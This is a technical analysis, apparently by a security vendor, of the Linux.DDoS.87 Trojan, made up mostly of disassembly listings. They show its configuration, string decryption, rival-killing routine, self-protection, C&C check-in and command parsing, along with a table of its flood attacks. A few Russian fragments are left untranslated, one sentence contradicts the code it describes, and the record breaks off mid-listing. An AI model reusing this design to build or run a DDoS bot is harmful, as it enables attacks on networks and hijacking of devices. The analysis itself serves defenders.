- c129e2a23abe826f808725a0724f12470502a3cc - x86
- 8fd0d16edf270c453c5b6b2481d0a044a410c7cd - ARM
- 9ff383309ad63da2caa9580d7d85abeece9b13a0 - ARM
A Trojan for Linux designed to carry out DDoS attacks. All versions of this malicious program use the library. Before starting the cycle of receiving and executing commands, the Trojan calls the following functions:
.text:0804B378 push 1000h ; size
.text:0804B37D call _malloc
.text:0804B382 mov edi, eax ; buffer for command
.text:0804B384 call fillConfig
.text:0804B389 call init_random
.text:0804B38E call runKiller
.text:0804B393 call fillCmdHandlers
This function uses one memory sector to store configuration information. This configuration storing can be described in the C language as follows:
union {
char *;
short *;
int *;
} conf_data;
struct conf_entry {
uint32 number;
conf_data data;
uint32 length
struct malware_config {
conf_entry *entries;
uint32 entries_count;
Each configuration field is filled in the following way:
Config.entries = realloc(Config.entries, 12 * Config.length + 12);
v0 = &Config.entries[Config.length];
v0->number = 0;
v1 = malloc(4u);
*v1 = XX;
v1[1] = XX;
v1[2] = XX;
v1[3] = XX;
v0->data = v1;
v2 = Config.entries;
v3 = Config.length + 1;
Config.entries[Config.length].length = 4;
Config.length = v3;
Some strings are stored in an encrypted ELF file and are decrypted before being recorded:
.text:0804CA8B call _realloc
.text:0804CA90 mov edx, ds:Config.length
.text:0804CA96 lea edx, [edx+edx*2]
.text:0804CA99 mov ds:Config.entries, eax
.text:0804CA9E lea esi, [eax+edx*4]
.text:0804CAA1 mov dword ptr [esi], 0Bh
.text:0804CAA7 mov [esp+1Ch+size], 49h ; size
.text:0804CAAE call _malloc
.text:0804CAB3 mov edx, 1
.text:0804CAB8 mov ebx, eax
.text:0804CABA mov ecx, offset unk_804FD80
.text:0804CABF add esp, 10h
.text:0804CAC2 loc_804CAC2: ; CODE XREF: fillConfig+4D0j
.text:0804CAC2 mov al, [ecx]
.text:0804CAC4 inc ecx
.text:0804CAC5 xor eax, 0FFFFFFAFh
.text:0804CAC8 mov [edx+ebx-1], al
.text:0804CACC inc edx
.text:0804CACD cmp edx, 4Ah
.text:0804CAD0 jnz short loc_804CAC2
.text:0804CAD2 mov eax, ds:Config.length
.text:0804CAD7 mov ecx, ds:Config.entries
.text:0804CADD mov [esi+4], ebx
.text:0804CAE0 lea edx, [eax+eax*2]
.text:0804CAE3 inc eax
.text:0804CAE4 mov dword ptr [ecx+edx*4+8], 49h
.text:0804CAEC mov ds:Config.length, eax
the following data is saved to the examined sample’s configuration:
Number | Data type | Value | Purpose |
0 | uint32 | — | Command and control server’s IP address |
1 | uint 16 | — | port |
2 | string | 'kami\x00' | displayed in main on stdin upon launching the Trojan |
3 | uint 8 | 1 | Sent to the server after transferring the MAC address |
4 | 4 | 0x08080808 | not used |
5 | 4 | JR** | not used |
6 | 4 | 0x06400640 | not used |
7 | 4 | 0x0300f4d1 | not used |
8 | string | "TSource Engine Query" | cmd1 - TSource Engine DDoS |
9 | string | "/" | cmd14 default page |
10 | string | "" | cmd14 default host |
11 | string | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0" | cmd14 User Agent для запроса |
12 | string | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" | cmd14 User Agent для запроса |
13 | string | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36" | cmd14 User Agent для запроса |
14 | string | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36" | cmd14 User Agent для запроса |
15 | string | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56" | not used |
20 | string | "GET " | cmd14 generating requests |
21 | string | " HTTP/1.1" | cmd14 generating requests |
22 | string | "Host: " | cmd14 generating requests |
23 | string | "Connection: keep-alive" | cmd14 generating requests |
24 | string | "User-Agent: " | cmd14 generating requests |
25 | string | "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" | cmd14 generating requests |
26 | string | "Accept-Encoding: gzip, deflate, sdch" | cmd14 generating requests |
27 | string | "Accept-Language: en-US,en;q=0.8" | cmd14 generating requests |
28 | string | "Cookie: " | not used |
29 | string | "/proc/" | used by runKiller function |
30 | string | "/exe" | used by runKiller function |
31 | string | "/cwd/" | used by runKiller function |
33 | string | ".shinigami" | used by runKiller and main functions |
100 | string | "gayfgt" | used by runKiller function |
101 | string | "REPORT %s:%s" | used by runKiller function |
102 | string | "hello friend " | used by runKiller function |
103 | string | "[KTN]" | used by runKiller function |
The following functions are then used to get the configuration values:
Function | Purpose |
char *get_data_from_config(int number) | returns the data pointer for conf_entry with the number value |
uint32 get_conf_uint32(int number) | returns unit32 stored under the data pointer for conf_entry with the number value |
uint16 get_conf_uint16(int number) | returns unit16 stored under the data pointer for conf_entry with the number value |
uint8 get_conf_uint8(int number) | returns unit8 stored under the data pointer for conf_entry with the number value |
This function initializes the generation of pseudo-random sequences. Linux.BackDoor.Fgt and Linux.BackDoor.Tsunami used such generators; however, their operation was implemented in a different manner.
The init_rand function from Linux.DDoS.87:
.text:080481AC init_rand proc near ; CODE XREF: sendUDP+249p
.text:080481AC ; processCmd+1E3p ...
.text:080481AC var_4 = dword ptr -4
.text:080481AC arg_0 = dword ptr 8
.text:080481AC push ebp
.text:080481AD mov ebp, esp
.text:080481AF sub esp, 10h
.text:080481B2 mov eax, [ebp+arg_0]
.text:080481B5 mov ds:Q, eax
.text:080481BA mov eax, [ebp+arg_0]
.text:080481BD sub eax, 61C88647h
.text:080481C2 mov ds:dword_80599E4, eax
.text:080481C7 mov eax, [ebp+arg_0]
.text:080481CA add eax, 3C6EF372h
.text:080481CF mov ds:dword_80599E8, eax
.text:080481D4 mov [ebp+var_4], 3
.text:080481DB jmp short loc_8048211
.text:080481DD ; ---------------------------------------------------------------------------
.text:080481DD loc_80481DD: ; CODE XREF: init_rand+6Cj
.text:080481DD mov ecx, [ebp+var_4]
.text:080481E0 mov eax, [ebp+var_4]
.text:080481E3 sub eax, 3
.text:080481E6 mov edx, ds:Q[eax*4]
.text:080481ED mov eax, [ebp+var_4]
.text:080481F0 sub eax, 2
.text:080481F3 mov eax, ds:Q[eax*4]
.text:080481FA xor edx, eax
.text:080481FC mov eax, [ebp+var_4]
.text:080481FF xor eax, edx
.text:08048201 xor eax, 9E3779B9h
.text:08048206 mov ds:Q[ecx*4], eax
.text:0804820D add [ebp+var_4], 1
.text:08048211 loc_8048211: ; CODE XREF: init_rand+2Fj
.text:08048211 cmp [ebp+var_4], 0FFFh
.text:08048218 jle short loc_80481DD
.text:0804821A leave
.text:0804821B retn
.text:0804821B init_rand endp
Функция init_random из Linux.DDoS.87:
.text:0804C090 init_random proc near ; CODE XREF: main+29p
.text:0804C090 ; sub_804B930+CFp
.text:0804C090 push esi
.text:0804C091 push ebx
.text:0804C092 sub esp, 4
.text:0804C095 call ___libc_getpid
.text:0804C09A mov esi, eax
.text:0804C09C call _getppid
.text:0804C0A1 sub esp, 0Ch
.text:0804C0A4 mov ebx, eax
.text:0804C0A6 push 0 ; time
.text:0804C0A8 call ___GI_time
.text:0804C0AD imul ebx, eax
.text:0804C0B0 mov ecx, 3
.text:0804C0B5 add esp, 10h
.text:0804C0B8 lea edx, [esi+ebx]
.text:0804C0BB mov ds:random_gen_data, edx
.text:0804C0C1 lea eax, [edx-61C88647h]
.text:0804C0C7 mov ds:rand1, eax
.text:0804C0CC lea eax, [edx+3C6EF372h]
.text:0804C0D2 mov ds:rand2, eax
.text:0804C0D7 loc_804C0D7: ; CODE XREF: init_random+6Fj
.text:0804C0D7 mov edx, ds:dword_8051694[ecx*4]
.text:0804C0DE mov eax, ecx
.text:0804C0E0 xor eax, edx
.text:0804C0E2 mov edx, ds:dword_8051698[ecx*4]
.text:0804C0E9 xor edx, 9E3779B9h
.text:0804C0EF xor eax, edx
.text:0804C0F1 mov ds:random_gen_data[ecx*4], eax
.text:0804C0F8 inc ecx
.text:0804C0F9 cmp ecx, 1000h
.text:0804C0FF jnz short loc_804C0D7
.text:0804C101 pop eax
.text:0804C102 pop ebx
.text:0804C103 pop esi
.text:0804C104 retn
.text:0804C104 init_random endp
This function launches a child process designed to search running processes for other Trojans and terminate them. You can see a description of a child process’s operation below.
First, the process kills standard stdin, stdout, and stderr threads and retrieves the strings it needs from the configuration:
.text:0804AFAB push STDIN_FILENO ; fd
.text:0804AFAD call ___libc_close
.text:0804AFB2 mov dword ptr [esp+0], STDERR_FILENO ; fd
.text:0804AFB9 call ___libc_close
.text:0804AFBE mov dword ptr [esp+0], STDOUT_FILENO ; fd
.text:0804AFC5 call ___libc_close
.text:0804AFCA mov dword ptr [esp+0], 1Dh
.text:0804AFD1 call get_data_from_config
.text:0804AFD6 mov dword ptr [esp+0], 1Eh
.text:0804AFDD mov ds:proc, eax
.text:0804AFE2 call get_data_from_config
.text:0804AFE7 mov dword ptr [esp+0], 1Fh
.text:0804AFEE mov ds:exe, eax
.text:0804AFF3 call get_data_from_config
.text:0804AFF8 mov dword ptr [esp+0], 21h
.text:0804AFFF mov ds:cwd, eax
.text:0804B004 call get_data_from_config
.text:0804B009 mov dword ptr [esp+0], 64h
.text:0804B010 mov ds:shinigami, eax
.text:0804B015 call get_data_from_config
.text:0804B01A mov dword ptr [esp+0], 65h
.text:0804B021 mov ds:gayfgt, eax
.text:0804B026 call get_data_from_config
.text:0804B02B mov dword ptr [esp+0], 66h
.text:0804B032 mov ds:report_fmt, eax
.text:0804B037 call get_data_from_config
.text:0804B03C mov dword ptr [esp+0], 67h
.text:0804B043 mov ds:hello_friend, eax
.text:0804B048 call get_data_from_config
.text:0804B04D mov ebp, ds:proc
.text:0804B053 mov ds:KTN, eax
Then the Trojan tries to open the following file objects:
If successful, the relevant flag is set. If not, the process terminates itself:
.text:0804B13F cmp ds:couldOpenExe, 0
.text:0804B146 jz short loc_804B158
.text:0804B148 lea ebp, [esp+0A3Ch+var_226]
.text:0804B14F cmp ds:couldOpenCWD, 0
.text:0804B156 jnz short loc_804B17E
.text:0804B158 loc_804B158: ; CODE XREF: runKiller+1C6j
.text:0804B158 sub esp, 0Ch
.text:0804B15B push 0 ; status
.text:0804B15D call ___GI_exit
If the process continues operating, in five minutes it starts searching for other Trojans in order to terminate their operation by reading the content of the /proc/ folder in an infinite loop:
.text:0804B162 read_proc_from_begin: ; CODE XREF: runKiller+225j
.text:0804B162 sub esp, 0Ch
.text:0804B165 mov eax, [esp+0A48h+var_A34]
.text:0804B169 push eax
.text:0804B16A call ___GI_closedir
.text:0804B16F mov [esp+0A4Ch+fd], 5
.text:0804B176 call sleep
.text:0804B17B add esp, 10h
.text:0804B17E loc_804B17E: ; CODE XREF: runKiller+1D6j
.text:0804B17E sub esp, 0Ch
.text:0804B181 mov eax, ds:proc
.text:0804B186 push eax ; filename
.text:0804B187 call ___GI_opendir
.text:0804B18C mov [esp+0A4Ch+var_A34], eax
.text:0804B190 add esp, 10h
.text:0804B193 read_next_proc_entry: ; CODE XREF: runKiller+23Aj
.text:0804B193 ; runKiller+296j ...
.text:0804B193 sub esp, 0Ch
.text:0804B196 mov edx, [esp+0A48h+var_A34]
.text:0804B19A push edx
.text:0804B19B call ___GI_readdir
.text:0804B1A0 add esp, 10h
.text:0804B1A3 test eax, eax
.text:0804B1A5 jz short read_proc_from_begin
If the folder from which the process was run is found to contain a file named .shinigami, the process is not terminated because it is used to implement some kind self-protection:
.text:0804B1BC push eax ; char
.text:0804B1BD push eax ; int
.text:0804B1BE mov eax, ds:proc
.text:0804B1C3 push eax ; a2
.text:0804B1C4 push ebp ; a1
.text:0804B1C5 call strcpy
.text:0804B1CA pop ecx
.text:0804B1CB lea ebx, [ebp+eax+0]
.text:0804B1CF pop eax
.text:0804B1D0 push esi ; a2
.text:0804B1D1 push ebx ; a1
.text:0804B1D2 call strcpy
.text:0804B1D7 add ebx, eax
.text:0804B1D9 pop eax
.text:0804B1DA mov eax, ds:cwd
.text:0804B1DF pop edx
.text:0804B1E0 push eax ; a2
.text:0804B1E1 push ebx ; a1
.text:0804B1E2 call strcpy
.text:0804B1E7 pop edx
.text:0804B1E8 pop ecx
.text:0804B1E9 mov ecx, ds:shinigami
.text:0804B1EF lea eax, [ebx+eax]
.text:0804B1F2 push ecx ; a2
.text:0804B1F3 push eax ; a1
.text:0804B1F4 call strcpy
.text:0804B1F9 pop eax
.text:0804B1FA pop edx
.text:0804B1FB push 0 ; flags
.text:0804B1FD push ebp ; filename
.text:0804B1FE call ___GI___libc_open
.text:0804B203 add esp, 10h
.text:0804B206 test eax, eax
.text:0804B208 js short kill_if_bot
.text:0804B20A sub esp, 0Ch
.text:0804B20D push eax ; fd
.text:0804B20E call ___libc_close
.text:0804B213 add esp, 10h
.text:0804B216 jmp read_next_proc_entry
If the file named .shinigami is absent from the folder, the process’s executable file is read in order to find strings from a configuration whose numbers are higher than 100. Meanwhile, the Trojan reads file fragments sequentially. The size of each fragment is 0x800 byte. If the value required is at buffer overflow, the process is not terminated.
A function responsible for filling a structure that stores command handlers. The structure looks as follows:
struct cmd {
char number;
void *handler;
struct cmd_handlers {
cmd *handlers;
char length;
The structure is filled in the following way:
v0 = realloc(handlers.handlers, 8 * handlers.length + 8);
v1 = handlers.length + 1;
handlers.handlers = v0;
v2 = &v0[handlers.length];
v2->number = 0;
v2->func = cmd0_udp_random;
handlers.length = v1;
v3 = realloc(v0, 8 * v1 + 8);
handlers.handlers = v3;
v4 = handlers.length + 1;
v5 = &v3[handlers.length];
v5->number = 1;
v5->func = cmd1_tsource;
As a result, the following command table is generated:
Number | Purpose |
15-17 | The examined sample contains functions that are executed in an infinite loop |
14 | HTTP flood |
9 | Transparent Ethernet Bridging в GRE |
8 | UDP flood overGRE |
7 | Establishing a TCP connection |
6 | sending a TCP packet |
4 | TCP flood—send packets containing random data |
3 | TCP flood—send packets with TCP options |
2 | DNS flood |
1 | TSource flood |
0 | UDP flood |
Once all the above functions are performed, the following string is retrieved from the configuration and added to the stdin thread:
.text:0804B398 mov dword ptr [esp+0], 2
.text:0804B39F call get_data_from_config ; kami
.text:0804B3A4 mov [esp+0], eax ; a1
.text:0804B3A7 call strlen
.text:0804B3AC mov dword ptr [esp+0], 2
.text:0804B3B3 mov ebx, eax
.text:0804B3B5 call get_data_from_config
.text:0804B3BA add esp, 0Ch
.text:0804B3BD push ebx ; len
.text:0804B3BE push eax ; addr
.text:0804B3BF push 1 ; fd
.text:0804B3C1 call ___libc_write
.text:0804B3C6 add esp, 0Ch
.text:0804B3C9 push 1 ; int
.text:0804B3CB push offset newline ; int
.text:0804B3D0 push 1 ; fd
.text:0804B3D2 call ___libc_write
Then the Trojan removes its name to hide itself:
.text:0804B3D8 mov ebp, [esi] ; esi = argv[0]
.text:0804B3DA push ebp ; a1
.text:0804B3DB call strlen
.text:0804B3E0 add esp, 10h
.text:0804B3E3 mov ecx, eax
.text:0804B3E5 test eax, eax
.text:0804B3E7 jle short loc_804B3F6
.text:0804B3E9 xor edx, edx
.text:0804B3EB loc_804B3EB: ; CODE XREF: main+94j
.text:0804B3EB mov eax, [esi]
.text:0804B3ED mov byte ptr [eax+edx], 0
.text:0804B3F1 inc edx
.text:0804B3F2 cmp ecx, edx
.text:0804B3F4 jnz short loc_804B3EB
The child processes are subsequently launched (the code is simplified and contains no requests to the configuration)
//here is parent
pid_t child = fork();
if(child > 0){
waitpid(child, &status, 0); //waiting until child die
if(!child){ //child executing this
pid_t child2 = fork();
if(child2 > 0){//we spawn childen - time to die
exit(); //after this exit() grandpa will die too
pid_t child3 = fork();
v28 = __GI___libc_open(".shinigami", O_CREAT, v30);
if (v28 >= 0)
sleep(...) // one week
The .shinigami file is created in the Trojan’s folder to protect the Trojan from removing itself. The maximum uptime of Linux.DDoS.87 on an infected computer is one week, after which the Trojan terminates its operation.
The cycle for receiving and executing commands
After that, the malicious process tries to connect to the C&C server to get instructions:
.text:0804B44E call ___libc_fork
.text:0804B453 mov ebx, eax
.text:0804B455 test eax, eax
.text:0804B457 jg loc_804B84E
.text:0804B45D call ___GI_setsid
.text:0804B462 sub esp, 0Ch
.text:0804B465 push 0 ; fd
.text:0804B467 call ___libc_close
.text:0804B46C mov dword ptr [esp+0], 1 ; fd
.text:0804B473 call ___libc_close
.text:0804B478 mov dword ptr [esp+0], 2 ; fd
.text:0804B47F call ___libc_close
.text:0804B484 add esp, 10h
.text:0804B487 lea eax, [edi+2]
.text:0804B48A xor esi, esi
.text:0804B48C mov [esp+48Ch+ptr_to_third_comm_byte], eax
.text:0804B490 entry_point_of_payload_execution: ; CODE XREF: main+167j
.text:0804B490 ; main+17Aj ...
.text:0804B490 mov edx, esi
.text:0804B492 mov eax, 1000h
.text:0804B497 and edx, 0FFFFh
.text:0804B49D push 4000h ; int
.text:0804B4A2 sub eax, edx
.text:0804B4A4 push eax ; int
.text:0804B4A5 lea edx, [edi+edx]
.text:0804B4A8 mov eax, ds:fd
.text:0804B4AD push edx ; char *
.text:0804B4AE push eax ; int
.text:0804B4AF call ___libc_recv
.text:0804B4B4 add esp, 10h
.text:0804B4B7 test eax, eax
.text:0804B4B9 jle recv_failed
.text:0804B4BF add esi, eax
.text:0804B4C1 cmp si, 1
.text:0804B4C5 ja short recv_ok
.text:0804B4C7 jmp short entry_point_of_payload_execution
If recv returns an error, a socket is opened, and its content is recorded to the fd global variable:
.text:0804B553 recv_failed: ; CODE XREF: main+159j
.text:0804B553 mov eax, ds:fd
.text:0804B558 test eax, eax
.text:0804B55A js short fd_closed_or_uninitialized
.text:0804B55C sub esp, 0Ch
.text:0804B55F push eax ; fd
.text:0804B560 call ___libc_close
.text:0804B565 add esp, 10h
.text:0804B568 fd_closed_or_uninitialized: ; CODE XREF: main+1FAj
.text:0804B568 push eax
.text:0804B569 push 0
.text:0804B56B push 1
.text:0804B56D push 2
.text:0804B56F call ___GI_socket
.text:0804B574 add esp, 10h
.text:0804B577 mov ds:fd, eax
During reading/writing, a minute-long time-out is set:
socket_timeout.tv_sec = 60;
socket_timeout.tv_usec = 0;
__GI_setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &socket_timeout, 8);
__GI_setsockopt(fd, SOL_SOCKET, SO_SNDTIMEO, &socket_timeout, 8);
Then a connection to the C&C server is established:
.text:0804B5CE mov [esp+4ACh+cnc_sockaddr.sin_family], 2
.text:0804B5D8 add esp, 14h
.text:0804B5DB push 0
.text:0804B5DD call get_conf_uint32
.text:0804B5E2 mov dword ptr [esp+0], 1
.text:0804B5E9 mov [esp+49Ch+cnc_sockaddr.sin_addr.s_addr], eax
.text:0804B5F0 call get_conf_uint16
.text:0804B5F5 ror ax, 8
.text:0804B5F9 mov [esp+49Ch+cnc_sockaddr.sin_port], ax
.text:0804B601 add esp, 0Ch
.text:0804B604 mov eax, ds:fd
.text:0804B609 push 10h
.text:0804B60B lea edx, [esp+494h+cnc_sockaddr]
.text:0804B612 push edx
.text:0804B613 push eax
.text:0804B614 call ___libc_connect
After that the IP address of the interface in use is saved and a string containing an identifier of an infected device’s architecture (х86, ARM, MIPS, SPARC, SH-4 or M68K) is sent to the C&C server:
.text:0804B62F lea eax, [esp+490h+status]
.text:0804B636 mov ecx, ds:fd
.text:0804B63C push eax
.text:0804B63D lea edx, [esp+494h+var_54]
.text:0804B644 push edx
.text:0804B645 push ecx
.text:0804B646 call ___GI_getsockname
.text:0804B64B mov eax, [esp+49Ch+var_54.sin_addr.s_addr]
.text:0804B652 mov ds:selfaddr, eax
.text:0804B657 pop eax
.text:0804B658 pop edx
.text:0804B659 push 1 ; size
.text:0804B65B push 20h ; nmemb
.text:0804B65D call _calloc
.text:0804B662 mov dword ptr [esp+0], offset a2 ; "telnet.x86"
.text:0804B669 mov ebx, eax
.text:0804B66B call strlen
.text:0804B670 add esp, 0Ch
.text:0804B673 push eax ; a3
.text:0804B674 push offset a2 ; "telnet.x86"
.text:0804B679 push ebx ; a1
.text:0804B67A call strncpy
.text:0804B67F mov eax, ds:fd
.text:0804B684 push 4000h ; int
.text:0804B689 push 20h ; int
.text:0804B68B push ebx ; char *
.text:0804B68C push eax ; int
.text:0804B68D call ___libc_send
The MAC address of a network card is also sent to the C&C server:
.text:0804B756 push edx ; ifconf *
.text:0804B757 push SIOCGIFFLAGS ; request
.text:0804B75C push esi ; d
.text:0804B75D call ___GI_ioctl
.text:0804B762 add esp, 10h
.text:0804B765 test eax, eax
.text:0804B767 jnz short loc_804B735
.text:0804B769 test byte ptr [esp+48Ch+a1.ifr_ifru], 8
.text:0804B771 jnz short loc_804B735
.text:0804B773 push eax ; char *
.text:0804B774 lea eax, [esp+490h+a1]
.text:0804B77B push eax ; ifconf *
.text:0804B77C push SIOCGIFHWADDR ; request
.text:0804B781 push esi ; d
.text:0804B782 call ___GI_ioctl
.text:0804B787 add esp, 10h
.text:0804B78A test eax, eax
.text:0804B78C jnz short loc_804B735
.text:0804B78E push esi
.text:0804B78F push 6 ; a3
.text:0804B791 lea edx, [esp+494h+a1.ifr_ifru+2]
.text:0804B798 push edx ; a2
.text:0804B799 lea eax, [esp+498h+macAddr]
.text:0804B7A0 push eax ; a1
.text:0804B7A1 call strncpy
.text:0804B7A6 add esp, 10h
.text:0804B7A9 loc_804B7A9: ; CODE XREF: main+381j...
.text:0804B7A9 push 4000h ; int
.text:0804B7AE push 6 ; int
.text:0804B7B0 lea edx, [esp+494h+macAddr]
.text:0804B7B7 mov ebx, ds:fd
.text:0804B7BD push edx ; char *
.text:0804B7BE push ebx ; int
.text:0804B7BF call ___libc_send
.text:0804B7C4 mov dword ptr [esp+0], 3
.text:0804B7CB call get_data_char
.text:0804B7D0 mov ecx, ds:fd
.text:0804B7D6 mov [esp+49Ch+var_15], al
.text:0804B7DD push 4000h ; int
.text:0804B7E2 push 1 ; int
.text:0804B7E4 xor esi, esi
.text:0804B7E6 lea eax, [esp+4A4h+var_15]
.text:0804B7ED push eax ; char *
.text:0804B7EE push ecx ; int
.text:0804B7EF call ___libc_send
Data from the C&C server is saved to the buffer. If more than one command is received during an iteration, they are handled one by one. The format of the received command (for number fields, network byte order is used) is as follows:
Field | Purpose | Size |
fullLength | full length of the received command | 2 |
sleepTime | Time for execution (every command runs a new process using fork and then kills it) | 4 |
cmd | command number | 1 |
hostCount | number of attacked hosts | 1 |
target[hostCount] | target array | 5*hostCount |
param_cnt | number of parameters | 1 |
param[param_cnt] | Parameters | ... |
If the field fullLength equals 0, two zero bytes are sent to the C&C server:
.text:0804B518 recv_ok: ; CODE XREF: main+165j
.text:0804B518 mov ax, [edi]
.text:0804B51B ror ax, 8
.text:0804B51F test ax, ax
.text:0804B522 jnz short process_command
.text:0804B524 mov eax, ds:fd
.text:0804B529 push 4000h ; int
.text:0804B52E push 2 ; int
.text:0804B530 push edi ; char *
.text:0804B531 push eax ; int
.text:0804B532 call ___libc_send
.text:0804B537 add esp, 0Ch
.text:0804B53A sub esi, 2
.text:0804B53D push 0FFFFFFFFh
.text:0804B53F push 2
.text:0804B541 mov ebp, [esp+498h+ptr_to_third_comm_byte]
.text:0804B545 push ebp
.text:0804B546 call shiftBuffer
.text:0804B54B add esp, 10h
.text:0804B54E jmp entry_point_of_payload_execution
If the length is zero, the processor of the received command is launched:
text:0804B4D0 process_command: ; CODE XREF: main+1C2j
.text:0804B4D0 cmp ax, 1
.text:0804B4D4 jz short loc_804B4DC
.text:0804B4D6 cmp ax, 1000h
.text:0804B4DA ja short entry_point_of_payload_execution
.text:0804B4DC loc_804B4DC: ; CODE XREF: main+174j
.text:0804B4DC cmp ax, si
.text:0804B4DF ja short entry_point_of_payload_execution
.text:0804B4E1 sub si, ax
.text:0804B4E4 mov ebx, eax
.text:0804B4E6 and ebx, 0FFFFh
.text:0804B4EC push edx
.text:0804B4ED push edx
.text:0804B4EE lea eax, [ebx-2]
.text:0804B4F1 push eax ; a2
.text:0804B4F2 mov eax, [esp+498h+ptr_to_third_comm_byte]
.text:0804B4F6 push eax ; a1
.text:0804B4F7 call process
.text:0804B4FC add esp, 0Ch
.text:0804B4FF push 0FFFFFFFFh
.text:0804B501 push ebx
.text:0804B502 lea ebx, [edi+ebx]
.text:0804B505 push ebx
.text:0804B506 call shiftBuffer
.text:0804B50B add esp, 10h
.text:0804B50E cmp si, 1
.text:0804B512 jbe entry_point_of_payload_execution
The function receives a pointer to the third byte of the command and its length. Then it starts parsing the command’s arguments and filling the respective structures:
//structures representing data received from the server
struct target{
uint32_t ip; //ip цели
uint8_t maskbits; // if the specified number is less than 31, the Trojan will attack random hosts obtained from ip by randomly generating lowest bits maskbits
struct param{
uint8_t id;
uint8_t len;
uint8_t data[len];
//structures that are displayed in the Trojan
struct target_parsed {
uint32 target_ip;
uint8 maskbits;
sockaddr_in sockaddr;
struct param_parsed {
uint8 id;
char * data;
Code to initiate an analysis of the packet header:
.text:0804BA60 head_packet_parse: ; CODE XREF: process+12j
.text:0804BA60 mov edi, [esi+pkct_cmd.sleepTime] ; ebx = size
.text:0804BA62 ror di, 8
.text:0804BA66 ror edi, 10h
.text:0804BA69 ror di, 8
.text:0804BA6D cmp ebx, 4
.text:0804BA70 jz short ret_form_func
.text:0804BA72 mov al, [esi+pkct_cmd.cmd]
.text:0804BA75 cmp ebx, 5
.text:0804BA78 mov [esp+4Ch+var_39], al
.text:0804BA7C jz short ret_form_func
.text:0804BA7E mov al, [esi+pkct_cmd.host_count]
.text:0804BA81 test al, al
.text:0804BA83 jz short ret_form_func
.text:0804BA85 and eax, 0FFh
.text:0804BA8A lea edx, [ebx-6]
.text:0804BA8D mov [esp+4Ch+unprocessed_bytes], edx
.text:0804BA91 mov [esp+4Ch+target_count], eax
.text:0804BA95 lea ebp, [eax+eax*4]
.text:0804BA98 cmp edx, ebp
.text:0804BA9A jb short ret_form_func
.text:0804BA9C lea eax, []
.text:0804BA9F mov [esp+4Ch+var_18], eax
.text:0804BAA3 push eax
.text:0804BAA4 push eax
.text:0804BAA5 push 18h ; size
.text:0804BAA7 mov ecx, [esp+58h+target_count]
.text:0804BAAB push ecx ; nmemb
.text:0804BAAC call _calloc
.text:0804BAB1 mov [esp+5Ch+targets], eax
.text:0804BAB5 add esp, 10h
.text:0804BAB8 mov edx, [esp+4Ch+target_count]
.text:0804BABC test edx, edx
.text:0804BABE jle short end_target_parsing
Parsing code for received targets:
.text:0804BAC7 parse_next_target: ; CODE XREF: process+A3j
.text:0804BAC7 mov edx, []
.text:0804BACA mov [esi+target_parsed.target_ip], edx
.text:0804BACC mov al, []
.text:0804BACF add ecx, 5
.text:0804BAD2 mov [esi+target_parsed.masksize], al
.text:0804BAD5 mov [esi+target_parsed.sockaddr.sin_family], 2
.text:0804BADB mov [esi+target_parsed.sockaddr.sin_addr.s_addr], edx
.text:0804BADE add esi, 18h
.text:0804BAE1 cmp ecx, ebp
.text:0804BAE3 jnz short parse_next_target
.text:0804BAE5 mov edx, [esp+4Ch+target_count]
.text:0804BAE9 add ecx, 6
.text:0804BAEC mov [esp+4Ch+var_18], ecx
.text:0804BAF0 lea eax, [edx+edx*4]
.text:0804BAF3 sub ebx, eax
.text:0804BAF5 sub ebx, 6
.text:0804BAF8 mov [esp+4Ch+unprocessed_bytes], ebx
Then the Trojan determines whether the transmitted parameters need to be parsed. If they do, the run_command function is called after the parsing is complete:
.text:0804BAFC end_target_parsing: ; CODE XREF: process+7Ej
.text:0804BAFC mov eax, [esp+4Ch+unprocessed_bytes]
.text:0804BB00 mov [esp+4Ch+params_buffer], 0
.text:0804BB08 test eax, eax
.text:0804BB0A jz short finish_processing ; no param_cnt field = error
.text:0804BB0C mov ebx, [esp+4Ch+var_18]
.text:0804BB10 mov bl, [ebx]
.text:0804BB12 mov [esp+4Ch+param_cnt], bl
.text:0804BB16 test bl, bl
.text:0804BB18 jnz start_parse_params
.text:0804BB1E mov [esp+4Ch+var_20], 0
.text:0804BB26 start_command_execution: ; CODE XREF: process+198j
.text:0804BB26 ; process+27Aj
.text:0804BB26 push ebp
.text:0804BB27 push ebp
.text:0804BB28 mov esi, [esp+54h+params_buffer]
.text:0804BB2C xor eax, eax
.text:0804BB2E push esi
.text:0804BB2F mov ebx, [esp+58h+param_count]
.text:0804BB33 push ebx
.text:0804BB34 mov ecx, [esp+5Ch+targets]
.text:0804BB38 push ecx
.text:0804BB39 mov edx, [esp+60h+targets_count]
.text:0804BB3D push edx
.text:0804BB3E mov al, [esp+64h+params]
.text:0804BB42 push eax
.text:0804BB43 push edi
.text:0804BB44 call run_command
The function receives a time value, a command number, a quantity and array of targets, and a quantity and array of parameters. First, the handler needed is searched for:
.text:0804B937 mov bl, ds:handlers.length
.text:0804B93D mov al, [esp+2Ch+number]
.text:0804B941 test bl, bl
.text:0804B943 mov [esp+2Ch+local_saved_number], al
.text:0804B947 movzx ebp, [esp+2Ch+target_count]
.text:0804B94C movzx edi, [esp+2Ch+params_count]
.text:0804B951 jz short return ; empty handlers
.text:0804B953 mov ecx, ds:handlers.handlers
.text:0804B959 xor esi, esi
.text:0804B95B cmp al, [ecx+cmd.number]
.text:0804B95D jz short handler_found
.text:0804B95F xor edx, edx
.text:0804B961 jmp short loc_804B977
.text:0804B963 ; ---------------------------------------------------------------------------
.text:0804B963 next_entry: ; CODE XREF: run_command+4Aj
.text:0804B963 xor eax, eax
.text:0804B965 mov al, dl
.text:0804B967 lea esi, ds:0[eax*8]
.text:0804B96E mov al, [esp+2Ch+local_saved_number]
.text:0804B972 cmp [esi+ecx], al
.text:0804B975 jz short handler_found
.text:0804B977 loc_804B977: ; CODE XREF: run_command+31j
.text:0804B977 inc edx
